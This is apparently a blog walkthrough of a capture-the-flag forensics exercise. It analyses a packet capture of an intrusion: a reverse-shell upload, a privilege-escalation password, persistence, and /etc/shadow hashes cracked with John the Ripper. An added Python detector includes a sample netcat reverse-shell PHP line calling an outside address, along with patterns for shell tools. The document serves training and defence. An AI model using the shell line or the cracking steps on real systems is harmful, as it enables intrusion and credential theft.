OVERPASS2HACKED — FORENSIC ANALYSIS OF THE PCAP FILE

Walk-throughs
4 min read · Mar 11, 2022

Overpass has been hacked! The SOC team (Paradox, congratulations on the promotion) noticed suspicious activity on a late night shift while looking at shibes, and managed to capture packets as the attack happened.

Can you work out how the attacker got in, and hack your way back into Overpass’ production server?

Note: Although this room is a walkthrough, it expects familiarity with tools and Linux. I recommend learning basic Wireshark and completing CC: Pentesting and Linux Fundamentals as a bare minimum.

The text above is the room's description and its prerequisites. The room provides a pcap file that you download for analysis; a pcap file contains captured network traffic, and the required tool for reading it is Wireshark.

This walkthrough only covers the first task of forensics, analyzing the pcap.

Open the pcap file in whichever way you prefer; I launch the Wireshark GUI and use File > Open.

Question One

What was the URL of the page they used to upload a reverse shell?

Since the question asks for a URL, it hints that we are looking at HTTP traffic, so we can filter on port 80 or use the http display filter. I applied the http filter in Wireshark and found the page shown in the image below.

The first packet is a GET request and the second is the response with status code 200 OK, meaning the request was received and processed successfully.

Following the HTTP stream:

The URL is identified as follows

Question Two

What payload did the attacker use to gain access?

To identify the payload, while still looking at traffic on port 80, we try to find out what happened on the /development/ page. We search for it through Edit > Find Packet, with the search type set to String.

Looking through various packets identified, one catches my attention.

Following the TCP stream, we identify the uploaded file payload.php: a PHP script that spawns a netcat reverse shell.
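The two findings so far (the upload page and the PHP reverse-shell payload) can be turned into a detection check. The example below is added here and is not from the room or the original post: it parses one raw HTTP request as "Follow TCP Stream" shows it, pulls the files out of a multipart/form-data upload, and flags uploads that carry a server-side script extension, PHP command-execution calls, or reverse-shell indicators. The request bytes, the Host header, the form field name and the 192.0.2.10 address are constructed for the example; only the /development/ path and the payload.php name come from the write-up.

```python
import re

# Constructed sample request (not the room's capture): a file upload to the
# /development/ page carrying a PHP file that calls out with netcat.
SAMPLE_REQUEST = (
    b"POST /development/upload.php HTTP/1.1\r\n"
    b"Host: overpass.example\r\n"
    b"Content-Type: multipart/form-data; boundary=----formboundary\r\n"
    b"\r\n"
    b"------formboundary\r\n"
    b'Content-Disposition: form-data; name="fileToUpload"; filename="payload.php"\r\n'
    b"Content-Type: application/octet-stream\r\n"
    b"\r\n"
    b'<?php exec("nc -e /bin/sh 192.0.2.10 4242"); ?>\r\n'
    b"------formboundary--\r\n"
)

SCRIPT_EXTS = (".php", ".phtml", ".phar", ".php5")
EXEC_FUNCS = re.compile(rb"\b(exec|shell_exec|system|passthru|popen|proc_open)\s*\(")
SHELL_HINTS = re.compile(rb"(\bnc\b|\bncat\b|/dev/tcp/|bash -i|/bin/sh)")


def parse_request(raw):
    """Split a raw HTTP request into (method, path, headers, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    method, path, _ = lines[0].split(b" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode()] = value.strip()
    return method.decode(), path.decode(), headers, body


def multipart_files(content_type, body):
    """Yield (filename, content) for each file part of a multipart/form-data body."""
    match = re.search(rb"boundary=([^;\s]+)", content_type)
    if not match:
        return
    delimiter = b"--" + match.group(1)
    for part in body.split(delimiter)[1:]:
        if part.startswith(b"--"):  # closing delimiter, no more parts
            break
        part_head, _, part_body = part.lstrip(b"\r\n").partition(b"\r\n\r\n")
        filename = re.search(rb'filename="([^"]*)"', part_head)
        if filename:
            yield filename.group(1).decode(), part_body.rstrip(b"\r\n")


def analyse_upload(raw):
    """Return [(path, filename, reasons)] for every suspicious file in one request."""
    method, path, headers, body = parse_request(raw)
    findings = []
    if method != "POST" or b"multipart/form-data" not in headers.get("content-type", b""):
        return findings
    for fname, data in multipart_files(headers["content-type"], body):
        reasons = []
        if fname.lower().endswith(SCRIPT_EXTS):
            reasons.append("server-side script extension")
        if b"<?php" in data and EXEC_FUNCS.search(data):
            reasons.append("php command execution")
        if SHELL_HINTS.search(data):
            reasons.append("reverse shell indicator")
        if reasons:
            findings.append((path, fname, reasons))
    return findings
```

Run against the sample it reports the /development/upload.php request with payload.php and all three reasons, while plain GET requests and uploads of non-script files produce no findings.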

Question Three

What password did the attacker use to privesc?

Privesc is short for privilege escalation, which means gaining rights and privileges beyond the intended ones, such as gaining administrative rights on a server.

We use the same search approach as in the previous question, except that we search for "password" in the packet bytes; we find a data file and some clues.

Following the TCP stream:

Highlighted in blue are all the commands run to identify the user, spawn a stable shell, list all files and directories, read the contents of the hidden directory .overpass, and check what commands the identified user can run.

Question Four

How did the attacker establish persistence?

The attacker installed a backdoor on the system to maintain persistence, as shown below.

Question five

Using the fasttrack wordlist, how many of the system passwords were crackable?

After the attacker gained privileged access, they read the /etc/shadow file and obtained several hashes, as seen below.

We add the hashes to a file and then download the fasttrack wordlist from GitHub, which we use to crack the hashes with the tool John the Ripper.

Run the following command: john --wordlist=yourwordlist passwordhashfile

Four passwords are cracked as shown above.

This marks the end of task one, forensics.

Malware analysis and attack tasks loading soon!

Happy hacking!
